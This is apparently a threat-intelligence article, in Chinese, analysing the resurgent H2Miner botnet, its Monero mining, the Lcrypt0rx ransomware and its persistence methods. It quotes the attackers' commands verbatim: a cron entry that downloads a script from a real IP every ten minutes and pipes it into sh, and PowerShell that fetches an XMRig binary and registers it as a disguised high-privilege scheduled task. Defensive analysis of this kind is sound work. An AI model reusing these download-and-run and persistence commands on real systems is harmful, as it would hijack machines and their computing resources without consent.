首次發(fā)現(xiàn)于2019年末的H2Miner僵尸網(wǎng)絡(luò)近期卷土重來，其攻擊手段已突破加密貨幣劫持與勒索軟件的界限。最新攻擊活動(dòng)利用廉價(jià)虛擬專用服務(wù)器(VPS)和多種常見惡意軟件，同時(shí)入侵Linux主機(jī)、Windows工作站和容器工作負(fù)載。

多平臺(tái)攻擊技術(shù)

攻擊者通過組合云環(huán)境感知腳本、跨平臺(tái)編譯二進(jìn)制文件以及系統(tǒng)原生命令，能在防御者察覺CPU負(fù)載異常前快速建立門羅幣挖礦通道。攻擊始于對(duì)配置錯(cuò)誤服務(wù)或漏洞應(yīng)用的利用，包括Apache ActiveMQ（CVE-2023-46604）和Log4Shell漏洞。

入侵成功后，僵尸網(wǎng)絡(luò)會(huì)部署定制化加載腳本——Linux系統(tǒng)使用ce.sh，Windows系統(tǒng)使用1.ps1——這些腳本會(huì)終止其他挖礦進(jìn)程、禁用終端防護(hù)，并從78.153.140.66下載XMRig挖礦程序。容器環(huán)境同樣遭受攻擊：spr.sh腳本會(huì)掃描Docker鏡像并移除阿里云的aegis防護(hù)代理，隨后植入Kinsing惡意軟件。

復(fù)合型攻擊基礎(chǔ)設(shè)施

同一攻擊基礎(chǔ)設(shè)施還托管著位于47.97.113.36的Cobalt Strike團(tuán)隊(duì)服務(wù)器，以及偽裝成"MicrosoftSoftware.exe"的Bitbucket代碼倉庫，顯示出成熟的多層命令與控制(C2)架構(gòu)。Fortinet分析師發(fā)現(xiàn)，新型VBScript勒索軟件Lcrypt0rx已與挖礦程序捆綁傳播。

雖然其加密算法較為簡單——采用8,192字符的XOR密鑰結(jié)合文件專屬鹽值——但該腳本仍會(huì)覆寫主引導(dǎo)記錄(MBR)，并在系統(tǒng)中散布偽裝持久化鉤子。

錢包地址與托管服務(wù)器的重疊表明，當(dāng)前攻擊者可能與H2Miner原始團(tuán)隊(duì)存在協(xié)作或從屬關(guān)系。

持久化機(jī)制剖析

H2Miner通過分層感染鏈實(shí)現(xiàn)持久化。初始腳本會(huì)枚舉防御進(jìn)程，使用暴力正則表達(dá)式終止這些進(jìn)程，并通過清除命令歷史來抹除攻擊痕跡。

Linux系統(tǒng)中，ce.sh會(huì)植入每10分鐘自我重下載的cron計(jì)劃任務(wù)：

( crontab -l 2>/dev/null ; \
 echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -

Windows系統(tǒng)則通過1.ps1腳本將XMRig注冊(cè)為計(jì)劃任務(wù)：

$miner = "$env:TEMP\sysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
     /tr "$miner" /sc minute /mo 15 /rl highest

復(fù)合防御策略需求

在Windows平臺(tái)，Lcrypt0rx通過Shell.Application提權(quán)后，會(huì)嘗試修改Winlogon Shell和映像劫持(IFEO)注冊(cè)表鍵實(shí)現(xiàn)持久化。雖然注冊(cè)表邏輯存在缺陷，但惡意軟件通過部署6個(gè)輔助腳本（從循環(huán)執(zhí)行殺毒軟件終止的advapi32_ext.vbs，到基礎(chǔ)自傳播腳本USB_bridge.vbs）確保存活。

這些輔助腳本均以隱藏系統(tǒng)文件屬性(+h +s +r)投放，并通過注冊(cè)表自啟動(dòng)項(xiàng)調(diào)用。配合cpr.sh等頻繁更新的腳本，即使部分組件被清除，僵尸網(wǎng)絡(luò)仍能重建挖礦通道。防御者需全面清理容器鏡像、計(jì)劃任務(wù)、cron條目和異常注冊(cè)表鍵，否則門羅幣錢包（如4ASk4RhU...p8SahC）將在警報(bào)解除后持續(xù)竊取計(jì)算資源。